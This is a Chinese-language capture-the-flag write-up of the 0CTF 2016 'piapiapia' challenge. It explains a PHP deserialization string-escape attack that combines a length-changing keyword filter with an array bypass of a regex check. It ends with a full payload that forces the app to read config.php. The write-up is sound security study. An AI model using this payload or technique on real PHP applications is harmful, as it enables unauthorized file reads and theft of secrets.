[0CTF 2016]piapiapia(反序列化逃逸)

通过扫描后台目录获得了源码（www.zip）。解压出来发现出了登录之外还有注册和其他的目录。在config.php中发现了flag变量，看来题目目的是让我们读取config.php了。
我们来看下每个页面：
1 index.php，register.php：
这两个个是登录页面和注册页面，要求我们输入的用户名和密码的长度都在3-16内。
2 class.php：
在class.php中我们发现了过滤的函数，一些特殊的符号会用下划线代替，一些特殊的关键字用hacker进行代替。

public function filter($string) {$escape = array('\'', '\\\\');$escape = '/' . implode('|', $escape) . '/';$string = preg_replace($escape, '_', $string);$safe = array('select', 'insert', 'update', 'delete', 'where');$safe = '/' . implode('|', $safe) . '/i';return preg_replace($safe, 'hacker', $string);}

除此之外还有增删改查等等。
3 update.php
在这个页面我们要输入phone，要求是11为的数字。email格式要求类似于1@qq.com。nickname要求为数字字母下划线并且长度要小于等于10。但这里应该是出题人故意留的，前两个都是不满足正则则退出，但是nickname是满足才退出，我们可以用数组绕过正则，比如 nickname=a! 会die出去但是nickname[]=a!则会成功执行下面的语句。

if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)die('Invalid nickname');

再往下便到了本题最关键的代码了，序列化再反序列化，序列化是在上传完电话邮箱等信息后，将数组进行序列化。
4 profile.php
在这个里面是将反序列化刚才生成的字符串。然后再将上传的photo中的内容用base64表示。对于我们来说，如果能讲photo中的文件名换成config.php则达成了我们的目的。
在反序列化中有个有趣的现象，我这里举个例子来看一下。对于这段代码，正常的输入如下。但是如果我们修改一下，变成这样，反序列化出来就会把后面的忽略掉。

<?php
$p='abc';
$f = serialize(array($p));
var_dump($f);?>

$s = 'a:1:{i:0;s:3:"axx";}bc";}';
var_dump(unserialize($s));

对于我们这个题，在我们输入正常的电话邮箱绰号照片后，正常的序列化字符串如下：

a:4:{s:5:"phone";s:11:"12345678901";s:5:"email";s:8:"1@qq.com";s:8:"nickname";s:3:"abc";s:5:"photo";s:39:"upload/47bce5c74f589f4867dbd57e9ca9f808";}

我们目的字符串是：

a:4:{s:5:"phone";s:11:"12345678901";s:5:"email";s:8:"1@qq.com";s:8:"nickname";s:3:"abc";s:5:"photo";s:10:"config.php";}

但是我们之前传的nickname是个数组，所以最终的目的字符串其实是：

a:4:{s:5:"phone";s:11:"12345678901";s:5:"email";s:8:"1@qq.com";s:8:"nickname";a:1:{i:0;s:3:"abc";s:5:"photo";s:10:"config.php";}

我们唯一能利用的地方就是 nickname我们可以输入 xxx"}s:5:“photo”;s:10:“config.php”;}
这样就可以把后面的忽略掉但是这个xxx的长度我们要保证符合真实的长度。这里正好可以利用过滤里的方法，因为nickname是先序列化然后再过滤的，但是生成的序列化字符串的长度还是原来的。比如我们nickname输入的是where长度是5 经过过滤后变成hacker长度变成了6.这时我们就可以有一个长度的字符可以利用，每输入一个where就有一个
我们根据我们的目的字符串内容，需要填充的是";}s:5:"photo";s:10:"config.php";}长度为34,如果我们输入34个where则足够填充这些字符达到逃逸的目的
所以最终的payload为

wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}

`我们解码base64即可获得flag。

[0CTF 2016]piapiapia(反序列化逃逸)相关推荐

BUCTF[0CTF 2016]piapiapia
[0CTF 2016]piapiapia 打开环境是个登录框,尝试了一下sql注入,发现并无任何用处. 于是扫描目录,发现了个/www.zip. 开始代码审计: 在config.php中看到了flag ...
BUU [0CTF 2016]piapiapia
BUU [0CTF 2016]piapiapia 进去之后是个登录界面,抓包有一个cookie.感觉是十六进制,但是其实不是这样做,是应该扫描的. buu什么都扫不出来,直接看源码. /registe ...
[0CTF 2016]piapiapia WP(详细)
[0CTF 2016]piapiapia WP(详细) 1.打开网站,是个登录框,尝试注入无果.....按道理来说就是注入了啊喂 2.玄学时间到::: 目录扫完啥结果没有.在buuctf做题总是这样, ...
[0CTF 2016]piapiapia php反序列化字符串逃逸
一.php反序列化字符串逃逸 <?phpclass user{public $user = 'admin';public $pass = 'passwd'; }$a = new user(); ...
[0CTF 2016]piapiapia总结（PHP序列化长度变化导致尾部字符逃逸）
这道题感觉很难,要是比赛中出这种题我肯定做不来,所以我耐着性子慢慢分析这道题,最后居然自己做了个七七八八,只剩下一点点就完全做出来了. 下面把我做这道题时的思路一步一步记录下来,希望能够彻底巩固. 一 ...
[0CTF 2016]piapiapia（字符逃逸详解）
目录知识点信息收集尝试SQL注入源码目录扫描代码审计 payload生成知识点信息泄露参数传递数组绕过字符串检测反序列化字符逃逸信息收集收集到了一只超可爱的小喵尝试SQL注入 ...
---已搬运--：[0CTF 2016]piapiapia -----代码审计+字符串逃逸+数组绕过长度限制+以及一下小知识点 preg_match()用数组，而且注意if是正确判断，还是错误判断
目录: 00000.知识点: 1.url传入数组绕过长度限制?? 2.数组的遍历 3.数组绕过正则一.自己做: 二.学到的&&不足: 四.学习WP 1.学习一个大佬的思路: 2.学习 ...
[0CTF 2016] piapiapia
piapiapia 猜测:SQL注入.弱口令,顺便扫一下目录 SQL注入失败,弱口令和目录扫描没有测试(过快扫描网站,返回429),服务器还是挺好的,从网上得知/www.zip 测试过后,发现 ind ...
审计练习5——[0CTF 2016]piapiapia
平台:buuoj.cn 打开靶机如下: 弱密码,sql乱试一波没反应,注册个账号进去之后让我们更新信息提交跳转到profile.php 扫一下网站目录.(我们在做题扫目录的时候经常会遇见429的情况 ...
[0CTF 2016]piapiapia -php序列化溢出
题目分析上来是一个登录页面:尝试注入无效: 然后扫后台:扫到源码www.zip 发现有注册页,注册登陆后可以填写自己的信息以及上传头像,走过一遍流程之后发现无法SSI也无法上传图片马: 源码分析 u ...

[0CTF 2016]piapiapia(反序列化逃逸)

[0CTF 2016]piapiapia(反序列化逃逸)相关推荐

最新文章

热门文章